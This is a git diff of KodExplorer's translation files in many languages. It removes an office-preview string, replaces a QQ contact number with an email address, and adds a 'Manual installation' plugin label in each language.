c25a849..59580f0 100755 --- a/config/i18n/ca/main.php +++ b/config/i18n/ca/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "intentar", "unknow_file_download" => "Descarregar l'arxiu", "unknow_plugin_search" => "aplicacions relacionades amb la recerca instal·lats", - "unknow_file_office" => "vista prèvia de l'oficina, kodcloud necessitat de ser desplegat fora de la xarxa

detalls>", "config_save_error_auth" => "No s'ha pogut desar la configuració, l'administrador va prohibir aquest privilegi!", "config_save_error_file" => "Error, l'arxiu no es pot escriure!", "beautify_code" => "codi formatador", @@ -281,7 +280,7 @@ return array( "forget_password" => "¿Ha oblidat la seva contrasenya", "forget_password_tips" => "Heu oblidat la contrasenya de l'administrador:
Si us plau, ingressi servidor eliminar ./data/system/install.lock restablir;

No oblidat la contrasenya d'administrador:
Si us plau, poseu-vos en contacte amb l'administrador per restablir!", "copyright_desc" => "Kodexplorer és un sistema de gestió de documents web altament aclamat, es pot utilitzar per a la gestió de documents interns o compartit, també es pot utilitzar al servidor de gestió del lloc, reemplaci ftp, així com el desenvolupament webIDE directament en línia. També pot programar el segon desenvolupament per integrar aquest principi en els seus sistemes existents.", - "copyright_contact" => "Autoritzar o personalitzat, poseu-vos en contacte amb QQ: 3532208565 problema Comentaris", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "retorn", "PluginReadme" => "descripció", "PluginResetConfig" => "Restaura la configuració predeterminada", + "PluginInstallSelf" => "Instal·lació manual", "Plugin.config.auth" => "permisos", "Plugin.config.authDesc" => "Tots els paràmetres disponibles, o especificar els usuaris, grups d'usuaris, grups de drets poden utilitzar", "Plugin.config.authAll" => "titular", diff --git a/config/i18n/cs/main.php b/config/i18n/cs/main.php index 52ae5a5..4affd1b 100755 Binary files a/config/i18n/cs/main.php and b/config/i18n/cs/main.php differ diff --git a/config/i18n/da/main.php b/config/i18n/da/main.php index d73a887..7ba2778 100755 Binary files a/config/i18n/da/main.php and b/config/i18n/da/main.php differ diff --git a/config/i18n/de/main.php b/config/i18n/de/main.php index cb4dd73..9d8a7d8 100755 --- a/config/i18n/de/main.php +++ b/config/i18n/de/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "versuchen", "unknow_file_download" => "Laden Sie die Datei", "unknow_plugin_search" => "Suchbezogene Anwendungen installiert", - "unknow_file_office" => "Büro Vorschau, kodcloud Bedarf außerhalb des Netzwerks eingesetzt werden

Details>", "config_save_error_auth" => "Konnte die Konfiguration zu speichern, verbot der Administrator dieses Privileg!", "config_save_error_file" => "Fehler, Datei nicht beschreibbar!", "beautify_code" => "Code Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Passwort vergessen", "forget_password_tips" => "Passwort Administrator-Passwort:
Bitte melden Sie sich Server löschen ./data/system/install.lock zurückgesetzt;

Nicht-Administrator Passwort vergessen:
Bitte kontaktieren Sie den Administrator zurücksetzen!", "copyright_desc" => "Kodexplorer ist ein hoch gelobten Web-Dokumenten-Management-System, können Sie es für die interne Dokumentenmanagement nutzen können oder gemeinsam genutzt, können auch auf der Site-Management-Server verwendet werden, ersetzen FTP-, auch als webIDE online Entwicklung. Sie können auch die zweite Entwicklung programmieren diese in Ihre bestehenden Systeme zu integrieren.", - "copyright_contact" => "Autorisieren oder besonders angefertigt, kontaktieren Sie bitte QQ: 3532208565 Problem Bewertung", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "Rückkehr", "PluginReadme" => "Beschreibung", "PluginResetConfig" => "Stellen Sie die Standardeinstellungen wieder her", + "PluginInstallSelf" => "Manuelle Installation", "Plugin.config.auth" => "Berechtigungen", "Plugin.config.authDesc" => "Alle der verfügbaren Einstellungen oder geben Sie Benutzer, Benutzergruppen, können Rechtsgruppen verwenden", "Plugin.config.authAll" => "Halter", diff --git a/config/i18n/el/main.php b/config/i18n/el/main.php index d176da2..c404747 100755 --- a/config/i18n/el/main.php +++ b/config/i18n/el/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "προσπαθώ", "unknow_file_download" => "Κατεβάστε το αρχείο", "unknow_plugin_search" => "εγκατασταθεί αναζήτησης που σχετίζονται με τις εφαρμογές", - "unknow_file_office" => "προεπισκόπηση γραφείο, kodcloud ανάγκη να αναπτυχθεί έξω από το δίκτυο

λεπτομέρειες>", "config_save_error_auth" => "Αποτυχία για να αποθηκεύσετε τη ρύθμιση, ο διαχειριστής απαγορευτεί αυτό το προνόμιο!", "config_save_error_file" => "Σφάλμα, το αρχείο δεν είναι εγγράψιμο!", "beautify_code" => "Κωδικός Μορφοποιητής", @@ -281,7 +280,7 @@ return array( "forget_password" => "Ξεχάσατε τον κωδικό σας", "forget_password_tips" => "Ξεχάσατε τον κωδικό πρόσβασης διαχειριστή:
Παρακαλούμε συνδεθείτε διακομιστής διαγράψετε ./data/system/install.lock επαναφορά?

Μη-διαχειριστής Ξεχάσατε τον κωδικό:
Παρακαλείστε να επικοινωνήσετε με το διαχειριστή για να επαναφέρετε!", "copyright_desc" => "Kodexplorer είναι ένα εγκωμιαστικές σύστημα διαχείρισης εγγράφων web, μπορείτε να το χρησιμοποιήσετε για την εσωτερική διαχείριση των εγγράφων ή κοινόχρηστο, μπορεί επίσης να χρησιμοποιηθεί στο διακομιστή διαχείρισης ιστοσελίδα, αντικαταστήστε FTP, ακόμη και ως webIDE απευθείας σύνδεση ανάπτυξη. Μπορείτε επίσης να προγραμματίσετε τη δεύτερη εξέλιξη να ενσωματώσουν αυτό σε υπάρχοντα συστήματα σας.", - "copyright_contact" => "Επιτρέπουν ή να προσαρμοστεί, παρακαλούμε επικοινωνήστε με QQ: 3532208565 πρόβλημα Feedback", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "απόδοση", "PluginReadme" => "περιγραφή", "PluginResetConfig" => "Επαναφέρετε τις προεπιλεγμένες ρυθμίσεις", + "PluginInstallSelf" => "Μη αυτόματη εγκατάσταση", "Plugin.config.auth" => "δικαιώματα", "Plugin.config.authDesc" => "Όλα τα διαθέσιμα ρυθμίσεις, ή να καθορίσετε τους χρήστες, ομάδες χρηστών, ομάδες για τα δικαιώματα μπορούν να χρησιμοποιήσουν", "Plugin.config.authAll" => "κάτοχος", diff --git a/config/i18n/en/main.php b/config/i18n/en/main.php index 25cce93..1ab3e2d 100755 --- a/config/i18n/en/main.php +++ b/config/i18n/en/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "try", "unknow_file_download" => "Download the file", "unknow_plugin_search" => "Search for related application installation", - "unknow_file_office" => "Office preview,kodcloud needs to be deployed in the network

more>", "config_save_error_auth" => "Error,no permission!", "config_save_error_file" => "Error, the file does not write permission!", "beautify_code" => "Code formatting", @@ -281,7 +280,7 @@ return array( "forget_password" => "Forget Password", "forget_password_tips" => "Forgot Administrator Password:
Please log into the server and delete ./data/system/install.lock reset;

Non-administrator Forgot Password:
Please contact the administrator to reset!", "copyright_desc" => "Kodexplorer is a highly acclaimed web document management system that you can use for internal document management or sharing. It can also be used to manage web sites on the server, replace Ftp, and even be developed directly as web IDE. At the same time you can also secondary development of this program integrated into your existing system.", - "copyright_contact" => "Authorize or customized, please contact QQ: 3532208565 problem Feedback", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "Back", "PluginReadme" => "Description", "PluginResetConfig" => "Restore the default settings", + "PluginInstallSelf" => "Manual installation", "Plugin.config.auth" => "Use permission", "Plugin.config.authDesc" => "Set the owner to use, or specify the user, user group, permission group can be used", "Plugin.config.authAll" => "Everyone", diff --git a/config/i18n/es/main.php b/config/i18n/es/main.php index c8352d5..1a5eea5 100755 --- a/config/i18n/es/main.php +++ b/config/i18n/es/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "intentar", "unknow_file_download" => "Descargar el archivo", "unknow_plugin_search" => "aplicaciones relacionadas con la búsqueda instalados", - "unknow_file_office" => "vista previa de la oficina, kodcloud necesidad de ser desplegado fuera de la red

detalles>", "config_save_error_auth" => "No se pudo guardar la configuración, el administrador prohibió este privilegio!", "config_save_error_file" => "Error, el archivo no se puede escribir!", "beautify_code" => "código formateador", @@ -281,7 +280,7 @@ return array( "forget_password" => "¿Ha olvidado su contraseña", "forget_password_tips" => "¿Ha olvidado la contraseña del administrador:
Por favor, ingrese servidor eliminar ./data/system/install.lock restablecer;

No olvidado la contraseña de administrador:
Por favor, póngase en contacto con el administrador para restablecer!", "copyright_desc" => "Kodexplorer es un sistema de gestión de documentos web altamente aclamado, se puede utilizar para la gestión de documentos internos o compartido, también se puede utilizar en el servidor de gestión del sitio, reemplace ftp, así como el desarrollo webIDE directamente en línea. También puede programar el segundo desarrollo para integrar este principio en sus sistemas existentes.", - "copyright_contact" => "Autorizar o personalizado, póngase en contacto con QQ: 3532208565 problema Comentarios", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "regreso", "PluginReadme" => "descripción", "PluginResetConfig" => "Restaurar la configuración predeterminada", + "PluginInstallSelf" => "Instalación manual", "Plugin.config.auth" => "permisos", "Plugin.config.authDesc" => "Todos los ajustes disponibles, o especificar los usuarios, grupos de usuarios, grupos de derechos pueden utilizar", "Plugin.config.authAll" => "titular", diff --git a/config/i18n/et/main.php b/config/i18n/et/main.php index 479dba1..2f8be69 100755 Binary files a/config/i18n/et/main.php and b/config/i18n/et/main.php differ diff --git a/config/i18n/fa/main.php b/config/i18n/fa/main.php index 9ce8f6b..abf780e 100755 --- a/config/i18n/fa/main.php +++ b/config/i18n/fa/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "امتحان", "unknow_file_download" => "دانلود فایل", "unknow_plugin_search" => "برنامه های مربوط به جستجو نصب", - "unknow_file_office" => "پیش نمایش اداری، نیاز kodcloud به خارج از شبکه مستقر می شود

جزئیات>", "config_save_error_auth" => "برای صرفه جویی در پیکربندی انجام نشد، مدیر ممنوع این امتیاز!", "config_save_error_file" => "خطا، فایل قابل نوشتن نیست!", "beautify_code" => "کد قالب", @@ -281,7 +280,7 @@ return array( "forget_password" => "رمز عبور خود را فراموش کرده", "forget_password_tips" => "را فراموش کرده اید رمز عبور:
لطفا سرور وارد شوید حذف ./data/system/install.lock تنظیم مجدد؛

غیر مدیر فراموشی رمز عبور:
لطفا با مدیریت تماس برای تنظیم مجدد!", "copyright_desc" => "Kodexplorer یک سیستم مدیریت اسناد وب بسیار تحسین است، شما می توانید آن را برای مدیریت اسناد داخلی یا به اشتراک گذاشته، همچنین می توانید بر روی سرور مدیریت سایت استفاده می شود استفاده کنید، جایگزین FTP، حتی به عنوان webIDE مستقیم توسعه آنلاین. شما همچنین می توانید توسعه دوم برنامه به ادغام این به سیستم های موجود خود را.", - "copyright_contact" => "اجازه و یا سفارشی، لطفا با QQ: 3532208565 مشکل فیدبک", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "برگشت", "PluginReadme" => "توصیف", "PluginResetConfig" => "تنظیمات پیش فرض را بازیابی کنید", + "PluginInstallSelf" => "نصب دستی", "Plugin.config.auth" => "مجوز", "Plugin.config.authDesc" => "همه از تنظیمات موجود، و یا مشخص کاربران، گروه های کاربری، گروه های حقوق می توانید استفاده کنید", "Plugin.config.authAll" => "دارنده", diff --git a/config/i18n/fi/main.php b/config/i18n/fi/main.php index 1cec3fb..00b53f8 100755 Binary files a/config/i18n/fi/main.php and b/config/i18n/fi/main.php differ diff --git a/config/i18n/fr/main.php b/config/i18n/fr/main.php index 0be049d..44ce98d 100755 --- a/config/i18n/fr/main.php +++ b/config/i18n/fr/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "essayer", "unknow_file_download" => "Télécharger le fichier", "unknow_plugin_search" => "applications liées à la recherche installés", - "unknow_file_office" => "bureau aperçu, nécessité kodcloud à déployer en dehors du réseau

détails>", "config_save_error_auth" => "Impossible d'enregistrer la configuration, l'administrateur a interdit ce privilège!", "config_save_error_file" => "Erreur, fichier non inscriptible!", "beautify_code" => "formateur de code", @@ -281,7 +280,7 @@ return array( "forget_password" => "Vous avez oublié votre mot de passe", "forget_password_tips" => "Mot de passe administrateur:
S'il vous plaît serveur connecter supprimer ./data/system/install.lock réinitialiser;

Non-administrateur Mot de passe oublié:
S'il vous plaît contacter l'administrateur pour réinitialiser!", "copyright_desc" => "Kodexplorer est un système de gestion de documents Web hautement acclamé, vous pouvez l'utiliser pour la gestion documentaire interne ou partagée, peut également être utilisé sur le serveur de gestion du site, remplacer Ftp, comme webIDE directement le développement en ligne. Vous pouvez également programmer le second développement à intégrer dans vos systèmes existants.", - "copyright_contact" => "Autorisez ou sur mesure, s'il vous plaît contacter QQ: 3532208565 problème Feedback", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "retour", "PluginReadme" => "description", "PluginResetConfig" => "Restaurer les paramètres par défaut", + "PluginInstallSelf" => "Installation manuelle", "Plugin.config.auth" => "autorisations", "Plugin.config.authDesc" => "Tous les paramètres disponibles, ou spécifier des utilisateurs, groupes d'utilisateurs, des groupes de droits peuvent utiliser", "Plugin.config.authAll" => "titulaire", diff --git a/config/i18n/gl/main.php b/config/i18n/gl/main.php index 958cfef..c13bdad 100755 Binary files a/config/i18n/gl/main.php and b/config/i18n/gl/main.php differ diff --git a/config/i18n/hi/main.php b/config/i18n/hi/main.php index acaeb82..d2a493c 100755 --- a/config/i18n/hi/main.php +++ b/config/i18n/hi/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "कोशिश", "unknow_file_download" => "फ़ाइल डाउनलोड करें", "unknow_plugin_search" => "खोजें से संबंधित आवेदन पत्र स्थापित", - "unknow_file_office" => "कार्यालय पूर्वावलोकन, kodcloud की जरूरत नेटवर्क

विवरण>", "config_save_error_auth" => "विन्यास को बचाने में विफल, व्यवस्थापक इस विशेषाधिकार पर प्रतिबंध लगा दिया!", "config_save_error_file" => "त्रुटि, फाइल लिखने योग्य नहीं!", "beautify_code" => "संहिता Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "अपना पासवर्ड भूल गए", "forget_password_tips" => "प्रशासक पासवर्ड भूल:
सर्वर लॉग इन करें रीसेट ./data/system/install.lock हटाना;

गैर-व्यवस्थापक पासवर्ड भूल:
रीसेट करने के लिए व्यवस्थापक से संपर्क करें!", "copyright_desc" => "Kodexplorer एक अत्यधिक प्रशंसित वेब दस्तावेज़ प्रबंधन प्रणाली है, तो आप भी webIDE सीधे ऑनलाइन विकास के रूप में, आंतरिक दस्तावेज़ प्रबंधन या साझा, भी इस साइट प्रबंधन सर्वर पर इस्तेमाल किया जा सकता है के लिए इसका इस्तेमाल, FTP जगह ले सकता है। तुम भी दूसरा विकास कार्यक्रम के लिए अपने मौजूदा सिस्टम में इस एकीकृत कर सकते हैं।", - "copyright_contact" => "अधिकृत करें या इच्छित, कृपया संपर्क करें QQ: 3532208565 समस्या प्रतिक्रिया", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "कॉपीराइट ©kodcloud.comसभी अधिकार सुरक्षित।", "copyright_pre" => "KodExplorer द्वारा संचालित", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "वापसी", "PluginReadme" => "विवरण", "PluginResetConfig" => "डिफ़ॉल्ट सेटिंग पुनर्स्थापित करें", + "PluginInstallSelf" => "मैन्युअल स्थापना", "Plugin.config.auth" => "अनुमतियां", "Plugin.config.authDesc" => "उपलब्ध सभी सेटिंग, या निर्दिष्ट करें कि उपयोगकर्ता, उपयोगकर्ता समूहों, अधिकार समूहों का उपयोग कर सकते", "Plugin.config.authAll" => "धारक", diff --git a/config/i18n/hr/main.php b/config/i18n/hr/main.php index cdd6503..ebdab0b 100755 Binary files a/config/i18n/hr/main.php and b/config/i18n/hr/main.php differ diff --git a/config/i18n/hu/main.php b/config/i18n/hu/main.php index c3375f9..3725929 100755 --- a/config/i18n/hu/main.php +++ b/config/i18n/hu/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "megpróbál", "unknow_file_download" => "Töltse le a fájlt", "unknow_plugin_search" => "Keresés kapcsolatos telepített alkalmazások", - "unknow_file_office" => "irodai előnézet, kodcloud igénybe kell venni a hálózaton kívüli

részletek>", "config_save_error_auth" => "Nem sikerült menteni a konfigurációt, az adminisztrátor megtiltotta ezt a kiváltságot!", "config_save_error_file" => "Hiba, a fájl nem írható!", "beautify_code" => "kód formázó", @@ -281,7 +280,7 @@ return array( "forget_password" => "Elfelejtett jelszó", "forget_password_tips" => "Elfelejtett adminisztrátori jelszó:
Kérjük jelentkezzen szerver törli ./data/system/install.lock vissza;

Nem rendszergazdai Elfelejtett jelszó:
Kérjük, lépjen kapcsolatba a rendszergazda gombot!", "copyright_desc" => "Kodexplorer egy nagysikerű webes dokumentumkezelő rendszer, akkor csak a belső dokumentumkezelő vagy megosztott, is fel lehet használni a site menedzsment szerver, cserélje ki az FTP, még akkor is, webIDE közvetlenül online fejlődését. Azt is lehet programozni a második fejlesztési integrálni ezt a meglévő rendszerekkel.", - "copyright_contact" => "Engedélyezi vagy testreszabott, forduljon QQ: 3532208565 probléma Visszajelzés", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "visszatérés", "PluginReadme" => "leírás", "PluginResetConfig" => "Állítsa vissza az alapértelmezett beállításokat", + "PluginInstallSelf" => "Kézi telepítés", "Plugin.config.auth" => "Engedélyek", "Plugin.config.authDesc" => "Az összes rendelkezésre álló beállítások, vagy adjon a felhasználók, felhasználói csoportok, jogi csoportok használhatják", "Plugin.config.authAll" => "tartó", diff --git a/config/i18n/id/main.php b/config/i18n/id/main.php index f121f82..a2678a6 100755 Binary files a/config/i18n/id/main.php and b/config/i18n/id/main.php differ diff --git a/config/i18n/it/main.php b/config/i18n/it/main.php index c8b0d02..b310515 100755 --- a/config/i18n/it/main.php +++ b/config/i18n/it/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "provare", "unknow_file_download" => "Scarica il file", "unknow_plugin_search" => "applicazioni di ricerca legate installati", - "unknow_file_office" => "ufficio anteprima, kodcloud bisogno di essere distribuito al di fuori della rete

dettagli>", "config_save_error_auth" => "Impossibile salvare la configurazione, l'amministratore ha vietato questo privilegio!", "config_save_error_file" => "Errore, il file non è scrivibile!", "beautify_code" => "Codice Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Hai dimenticato la password", "forget_password_tips" => "Hai dimenticato la password di amministratore:
Si prega di log del server eliminare ./data/system/install.lock resettare;

Non amministratore Forgot Password:
Si prega di contattare l'amministratore per ripristinare!", "copyright_desc" => "Kodexplorer è un sistema di gestione dei documenti web acclamato, è possibile utilizzarlo per la gestione dei documenti interni o in comune, può essere utilizzato anche sul server di gestione del sito, sostituire FTP, anche se webIDE sviluppo direttamente online. È inoltre possibile programmare il secondo sviluppo di integrare questo in sistemi esistenti.", - "copyright_contact" => "Autorizzare o su misura, si prega di contattare QQ: 3532208565 problema Commenti", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "ritorno", "PluginReadme" => "descrizione", "PluginResetConfig" => "Ripristinare le impostazioni predefinite", + "PluginInstallSelf" => "Installazione manuale", "Plugin.config.auth" => "permessi", "Plugin.config.authDesc" => "Tutte le impostazioni disponibili, o specificare gli utenti, gruppi di utenti, gruppi per i diritti possono utilizzare", "Plugin.config.authAll" => "titolare", diff --git a/config/i18n/ja/main.php b/config/i18n/ja/main.php index 0409b5b..b8dc995 100755 --- a/config/i18n/ja/main.php +++ b/config/i18n/ja/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "試します", "unknow_file_download" => "ファイルをダウンロード", "unknow_plugin_search" => "検索関連のアプリケーションがインストールされ", - "unknow_file_office" => "オフィスプレビュー、kodcloudは、ネットワーク

詳細>", "config_save_error_auth" => "設定を保存できませんでした、管理者がこの特権を禁止しました!", "config_save_error_file" => "エラー、ファイル書き込みできません!", "beautify_code" => "コードフォーマッター", @@ -281,7 +280,7 @@ return array( "forget_password" => "パスワードを忘れました", "forget_password_tips" => "管理者パスワードを忘れた場合:
サーバーがリセット./data/system/install.lock削除ログインしてください。

非管理者がパスワードを忘れました:
リセットするには、管理者に連絡してください!", "copyright_desc" => "KodexplorerはあなたもwebIDEオンラインで直接開発として、FTPを交換し、内部文書の管理や共有、また、サイト管理サーバ上で使用することができるためにそれを使用することができ、非常に評価の高いウェブ文書管理システムです。また、あなたの既存のシステムにこれを統合する2番目の開発をプログラムすることができます。", - "copyright_contact" => ":認可またはカスタマイズされた、QQにお問い合わせください3532208565 問題フィードバックを", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "リターン", "PluginReadme" => "説明", "PluginResetConfig" => "デフォルト設定を復元する", + "PluginInstallSelf" => "手動インストール", "Plugin.config.auth" => "アクセス権", "Plugin.config.authDesc" => "利用可能な設定のすべて、または指定したユーザー、ユーザーグループは、人権団体が使用することができます", "Plugin.config.authAll" => "ホルダー", diff --git a/config/i18n/ko/main.php b/config/i18n/ko/main.php index a33ec6a..a4e4c4e 100755 Binary files a/config/i18n/ko/main.php and b/config/i18n/ko/main.php differ diff --git a/config/i18n/lt/main.php b/config/i18n/lt/main.php index 2bc80f1..6eea93a 100755 --- a/config/i18n/lt/main.php +++ b/config/i18n/lt/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "pabandyti", "unknow_file_download" => "Atsisiųskite failą", "unknow_plugin_search" => "Ieškoti susijusių paraiškų įdiegtas", - "unknow_file_office" => "biuro peržiūra, kodcloud turi būti panaudotos už tinklo ribų

Išsamiau>", "config_save_error_auth" => "Nepavyko išsaugoti konfigūraciją, administratorius uždraudė šią privilegiją!", "config_save_error_file" => "Klaida, byla negali rašyti!", "beautify_code" => "kodas Formatuotojas", @@ -281,7 +280,7 @@ return array( "forget_password" => "Pamiršote slaptažodį", "forget_password_tips" => "Pamiršote administratoriaus slaptažodį:
Prašome prisijungti serverio ištrinti ./data/system/install.lock naujo;

Ne administratorius Pamiršote slaptažodį:
Prašome susisiekti su administratoriumi, kad iš naujo!", "copyright_desc" => "Kodexplorer yra labai pripažintas interneto dokumentų valdymo sistemos, jūs galite naudoti ją vidaus dokumentų valdymo ar dalijamasi, taip pat gali būti naudojamas ant svetainę valdymo serveris, pakeisti ftp, net webIDE tiesiogiai internetu plėtrą. Jūs taip pat galite užprogramuoti antrą plėtrą integruoti į savo esamas sistemas tai.", - "copyright_contact" => "Leisti ar individualų, susisiekite su QQ: 3532208565 problemos atsiliepimą", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "sugrįžimas", "PluginReadme" => "aprašymas", "PluginResetConfig" => "Atkurkite numatytuosius nustatymus", + "PluginInstallSelf" => "Rankinis diegimas", "Plugin.config.auth" => "leidimai", "Plugin.config.authDesc" => "Visi galimų nustatymų, arba nurodyti vartotojai, vartotojų grupės, teisių grupės gali naudoti", "Plugin.config.authAll" => "turėtojas", diff --git a/config/i18n/nl/main.php b/config/i18n/nl/main.php index 4b14831..961cfd2 100755 Binary files a/config/i18n/nl/main.php and b/config/i18n/nl/main.php differ diff --git a/config/i18n/no/main.php b/config/i18n/no/main.php index eb7c3ad..a2751e2 100755 Binary files a/config/i18n/no/main.php and b/config/i18n/no/main.php differ diff --git a/config/i18n/pl/main.php b/config/i18n/pl/main.php index f1ccef3..f9391c0 100755 Binary files a/config/i18n/pl/main.php and b/config/i18n/pl/main.php differ diff --git a/config/i18n/pt/main.php b/config/i18n/pt/main.php index 9f59fd0..3a9d2d7 100755 --- a/config/i18n/pt/main.php +++ b/config/i18n/pt/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "tentar", "unknow_file_download" => "Baixe o arquivo", "unknow_plugin_search" => "aplicações de pesquisa relacionados instalado", - "unknow_file_office" => "pré-visualização escritório, necessidade kodcloud para ser implantado fora da rede

detalhes>", "config_save_error_auth" => "Falha ao salvar a configuração, o administrador proibiu esse privilégio!", "config_save_error_file" => "De erro, o arquivo não pode ser escrito!", "beautify_code" => "código Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Esqueceu sua senha", "forget_password_tips" => "Esqueceu a senha de administrador:
Faça login servidor eliminar ./data/system/install.lock redefinir;

Não-administrador Esqueceu a senha:
Entre em contato com o administrador para redefinir!", "copyright_desc" => "Kodexplorer é um sistema de gerenciamento de documentos web altamente aclamado, você pode usá-lo para gerenciamento de documentos internos ou compartilhado, também pode ser usado no servidor de gerenciamento do site, substitua FTP, até mesmo como webIDE desenvolvimento diretamente online. Você também pode programar o segundo desenvolvimento para integrar isso em seus sistemas existentes.", - "copyright_contact" => "Autorizar ou personalizado, entre em contato QQ: 3532208565 problema comentários", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "retorno", "PluginReadme" => "descrição", "PluginResetConfig" => "Restaurar as configurações padrão", + "PluginInstallSelf" => "Instalação manual", "Plugin.config.auth" => "permissões", "Plugin.config.authDesc" => "Todas as configurações disponíveis, ou especificar os usuários, grupos de usuários, grupos de direitos pode usar", "Plugin.config.authAll" => "titular", diff --git a/config/i18n/ro/main.php b/config/i18n/ro/main.php index e4454bb..c4e264d 100755 --- a/config/i18n/ro/main.php +++ b/config/i18n/ro/main.php @@ -200,7 +200,6 @@ return array( "unknow_file_try" => "încerca", "unknow_file_download" => "Descărcați fișierul", "unknow_plugin_search" => "legate de aplicații de căutare instalate", - "unknow_file_office" => "previzualizare birou, nevoia kodcloud care urmează să fie desfășurați în afara rețelei

detalii>", "config_save_error_auth" => "Nu a putut salva configurația, administratorul a interzis acest privilegiu!", "config_save_error_file" => "Eroare, fișier nu seteze acest atribut!", "beautify_code" => "cod Formatter", @@ -281,7 +280,7 @@ return array( "forget_password" => "Ați uitat parola", "forget_password_tips" => "Administrator Password a uitat:
Vă rugăm să vă conectați serverul șterge ./data/system/install.lock reset;

Non-administrator Ai uitat parola:
Vă rugăm să contactați administratorul pentru a reseta!", "copyright_desc" => "Kodexplorer este un sistem de management al documentelor web extrem de apreciat, îl puteți utiliza pentru gestionarea documentelor interne sau partajat, poate fi utilizat și pe serverul de management al site-ului, înlocuiți Ftp, chiar ca webIDE de dezvoltare direct online. De asemenea, puteți programa a doua de dezvoltare pentru a integra acest lucru în sistemele existente.", - "copyright_contact" => "Sau personalizate Autorizează, vă rugăm să contactați QQ: 3532208565 problemă Feedback", + "copyright_contact" => "Contact us:kodcloud@qq.com . Feedback", "copyright_info" => "Copyright © kodcloud.com All rights reserved.", "copyright_pre" => "Powered by KodExplorer", "kod_name" => "KodExplorer", @@ -730,6 +729,7 @@ return array( "PluginBack" => "întoarcere", "PluginReadme" => "descriere", "PluginResetConfig" => "Restaurați setările implicite", + "PluginInstallSelf" => "Instalare manuală", "Plugin.config.auth" => "Permisiuni", "Plugin.config.authDesc" => "Toate setările disponibile, sau specificați utilizatori, grupuri de utilizatori, grupuri de drepturi pot utiliza", "Plugin.config.authAll" => "titular", diff --git a/config/i18n/ru/about.html b/config/i18n/ru/about.html index 01efb4c..383e50d 100755 --- a/config/i18n/ru/about.html +++ b/config/i18n/ru/about.html @@ -1,8 +1,7 @@
Что такое KODExplorer?
-

KODExplorer - это веб-интерфейс с открытым исходным кодом, созданный для управления онлайн документами и редактирования кода. В нём использован классический оконный интерфейс, как у Windows. Он имеет набор онлайн инструментов для предварительного просмотра, - редактирования, выгрузки, скачивания и распаковывания файлов, онлайн воспроизведения музыки. Вы можете разрабатывать прямо в браузере, смотреть код, а также напрямую разворачивать свой веб-сайт. Это удобно, быстро и безопасно.

+

